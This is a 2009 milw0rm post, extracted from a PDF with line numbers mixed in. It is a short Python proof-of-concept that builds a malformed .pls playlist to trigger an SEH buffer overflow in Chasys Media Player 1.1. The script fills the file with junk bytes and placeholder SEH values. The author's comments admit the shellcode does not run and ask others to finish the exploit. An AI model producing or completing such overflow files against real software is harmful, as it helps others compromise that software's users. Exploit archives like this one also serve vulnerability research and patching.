Chasys Media Player 1.1 .pls Local Buffer Overflow PoC SEH.pdf

1 #!/usr/bin/python 2 # Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC 3 # SEH And NEXT_SEH are Overwritten but shellcode doesn’t executed !!! 4 # I have tried a lot of Addresses . 5 # Waitting for the Exploit from someone . 6 # Download : http://www.jpcha2.com/setup/chasys_media_player.zip 7 print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC" 8 print " Discovered By : zAx" 9 print " Contact : ThE−zAx@Hotmail.Com" 10 header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3 D" 11 junk = "\x41"*2024 12 next_seh = "\x42"*4 13 seh = "\x43"*4 14 other_data = "\xCC"*800 15 ex = header + junk + next_seh + seh + other_data 16 file=open("zAx.pls","w") 17 file.write(ex) 18 file.close() 19 20 # milw0rm.com [2009−03−18] Page 1/1 Chasys Media Player 1.1 .pls Local Buffer Overflow PoC SEH zAx 03/18/2009